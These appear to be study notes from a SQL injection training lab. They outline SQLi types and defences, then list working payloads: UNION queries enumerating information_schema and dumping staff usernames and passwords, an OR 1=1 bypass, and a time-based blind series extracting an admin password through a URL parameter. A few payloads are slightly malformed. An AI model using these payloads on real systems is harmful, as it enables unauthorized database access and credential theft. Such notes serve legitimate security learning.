Different types of SQL Injection

In-Band SQLi

Easy to detect and exploit SQLi vulnerability on website. Returns data from database on same website

Error-Based SQLi

Easily obtain information about the database structure as error messages.

Union-Based SQLi

Exploit UNION operator with SELECT statement

Blind SQLi

None or near none feedback for queries.

Boolean based SQLi

Sometimes we can only exploit true/false query like if username exists.

Time based SQLi

Exploit sleep() when sending queries. When there is no visual indicator of response we can see how long it took to response.

Out-of-Band SQLi

hacker to website -> website to db -> db to hacker's with the requested data using http or dns protocol.

Terms

information_schema contains information about every database and tables. Every user has access to this.

How to protect against SQLi

• Prepared Statements - parameters are added to query to prepared places
• Input Validation - disallow some characters like ' or --. Allow only certain strings.
• Escaping User Input - Allow user to use chars like $ ' " with \ that changes them to regular strings.

Examples

Database name

0 UNION SELECT 1,2,database()

Database tables

0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'

using separator

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

return true

’ OR 1=1;–

Time passed attacks

Table Schema

admin123' UNION SELECT SLEEP(1),2 where database() like 'sqli_four';--

Table Name

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.TABLES WHERE table_schema = 'sqli_four' and table_name like '%';--

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.TABLES WHERE table_schema = 'sqli_four' and table_name like '%' and table_name!='users' and table_name!='analytics_referrers';--

Column Name:

analytics_referrers

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='analytics_referrers' and COLUMN_NAME='id';--

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='analytics_referrers' and COLUMN_NAME like 'domain' and COLUMN_NAME !='id';

users

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like '%';--

admin123' UNION SELECT SLEEP(1), 2 FROM information_schema.COLUMNS WHERE table_schema = 'sqli_four' and table_name='users' and COLUMN_NAME like '%' and column_name != 'password'column_name != 'id' column_name != 'username';--

username and password:

admin123' UNION SELECT SLEEP(1), 2 from analytics_referrers where id like '%';-- << NONE

admin123' UNION SELECT SLEEP(1), 2 from analytics_referrers where domain like '%';-- << NONE

admin123' UNION SELECT SLEEP(1), 2 from users where username like '%';- << admin

https://website.thm/analytics?referrer=admin123' UNION SELECT SLEEP(1), 2 from users where username='admin' and password like '%';-- << 4961